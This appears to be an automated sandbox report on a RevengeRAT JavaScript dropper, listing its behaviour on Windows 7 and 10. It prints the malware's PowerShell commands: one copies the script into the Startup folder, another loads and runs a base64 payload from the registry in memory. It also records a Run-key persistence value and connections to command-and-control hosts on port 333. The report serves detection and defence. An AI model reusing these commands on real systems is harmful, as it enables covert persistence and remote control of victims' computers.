Malware Analysis Report

2024-10-19 08:42

Sample ID 240319-28sytsah3t
Target d7520f1f5438e4e82c1234fbcb10c6dc
SHA256 1572fa79a4de01323cc1f469d514d9711b3f88f47eedf6af7041f595d23f0c6a
Tags
revengerat office persistence stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1572fa79a4de01323cc1f469d514d9711b3f88f47eedf6af7041f595d23f0c6a

Threat Level: Known bad

The file d7520f1f5438e4e82c1234fbcb10c6dc was found to be: Known bad.

Malicious Activity Summary

revengerat office persistence stealer trojan

RevengeRAT

RevengeRat Executable

Blocklisted process makes network request

Drops startup file

Checks computer location settings

Adds Run key to start application

Drops file in System32 directory

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-19 23:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-19 23:15

Reported

2024-03-19 23:18

Platform

win7-20240221-en

Max time kernel

148s

Max time network

149s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js

Signatures

RevengeRAT

trojan revengerat

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Office.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d7520f1f5438e4e82c1234fbcb10c6dc.js C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Office = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\d7520f1f5438e4e82c1234fbcb10c6dc.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js'))"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"

Network

Country Destination Domain Proto
US 8.8.8.8:53 workwinrarhost.ddns.com.br udp
BR 200.98.145.82:333 workwinrarhost.ddns.com.br tcp
BR 200.98.145.82:333 workwinrarhost.ddns.com.br tcp
US 8.8.8.8:53 office.minhaempresa.tv udp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
US 8.8.8.8:53 workwinrarhost.ddns.com.br udp
BR 200.98.145.82:333 workwinrarhost.ddns.com.br tcp
BR 200.98.145.82:333 workwinrarhost.ddns.com.br tcp
US 8.8.8.8:53 office.minhaempresa.tv udp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
US 8.8.8.8:53 workwinrarhost.ddns.com.br udp
BR 200.98.145.82:333 workwinrarhost.ddns.com.br tcp
BR 200.98.145.82:333 workwinrarhost.ddns.com.br tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f19d9ea6a6a0d49bf8b37f9575e94712
SHA1 789cd1284971429d4677f3694508c619703899ce
SHA256 a4bc1eb07371da6a6a59fbc8cfa947003825544823fd81baa17a7a288158083d
SHA512 592665aa84aecb432a1c8c4ebae6a25bdab0875cee1376e7485757477c2cf7e9ff5d6e52a4dcc3414cce62fd3ae30a764ffff93c55023ffc1a275f3b6aae186d

memory/2828-10-0x00000000024F0000-0x00000000024F8000-memory.dmp

memory/2832-9-0x000000001B190000-0x000000001B472000-memory.dmp

memory/2828-12-0x0000000002830000-0x000000000283A000-memory.dmp

memory/2832-13-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/2832-15-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2832-14-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2828-16-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/2828-17-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/2828-18-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/2832-20-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2828-21-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/2828-19-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/2832-22-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/2832-23-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/2832-25-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2832-24-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2828-26-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/2828-28-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/2828-27-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/2828-29-0x0000000002520000-0x00000000025A0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-19 23:15

Reported

2024-03-19 23:18

Platform

win10v2004-20231215-en

Max time kernel

146s

Max time network

150s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js

Signatures

RevengeRAT

trojan revengerat

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d7520f1f5438e4e82c1234fbcb10c6dc.js C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Office.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Office = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\d7520f1f5438e4e82c1234fbcb10c6dc.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js'))"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 workwinrarhost.ddns.com.br udp
BR 200.98.145.82:333 workwinrarhost.ddns.com.br tcp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
BR 200.98.145.82:333 workwinrarhost.ddns.com.br tcp
US 8.8.8.8:53 office.minhaempresa.tv udp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
US 8.8.8.8:53 workwinrarhost.ddns.com.br udp
BR 200.98.145.82:333 workwinrarhost.ddns.com.br tcp
BR 200.98.145.82:333 workwinrarhost.ddns.com.br tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 office.minhaempresa.tv udp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
BR 200.98.145.82:333 office.minhaempresa.tv tcp
US 8.8.8.8:53 workwinrarhost.ddns.com.br udp
BR 200.98.145.82:333 workwinrarhost.ddns.com.br tcp
US 8.8.8.8:53 74.239.69.13.in-addr.arpa udp

Files

memory/2272-9-0x000001DDEB9D0000-0x000001DDEB9F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5umq0dan.0mc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4600-19-0x00007FFC87130000-0x00007FFC87BF1000-memory.dmp

memory/4600-21-0x000001B039780000-0x000001B039790000-memory.dmp

memory/4600-20-0x000001B039780000-0x000001B039790000-memory.dmp

memory/2272-23-0x000001DDE9850000-0x000001DDE9860000-memory.dmp

memory/2272-22-0x000001DDE9850000-0x000001DDE9860000-memory.dmp

memory/2272-24-0x00007FFC87130000-0x00007FFC87BF1000-memory.dmp

memory/4600-25-0x000001B054300000-0x000001B054344000-memory.dmp

memory/4600-27-0x000001B053F40000-0x000001B053F4A000-memory.dmp

memory/2272-28-0x000001DDEBE70000-0x000001DDEBEE6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

memory/4600-32-0x00007FFC87130000-0x00007FFC87BF1000-memory.dmp

memory/4600-33-0x000001B039780000-0x000001B039790000-memory.dmp

memory/4600-34-0x000001B039780000-0x000001B039790000-memory.dmp

memory/2272-35-0x000001DDE9850000-0x000001DDE9860000-memory.dmp

memory/2272-36-0x000001DDE9850000-0x000001DDE9860000-memory.dmp

memory/2272-37-0x00007FFC87130000-0x00007FFC87BF1000-memory.dmp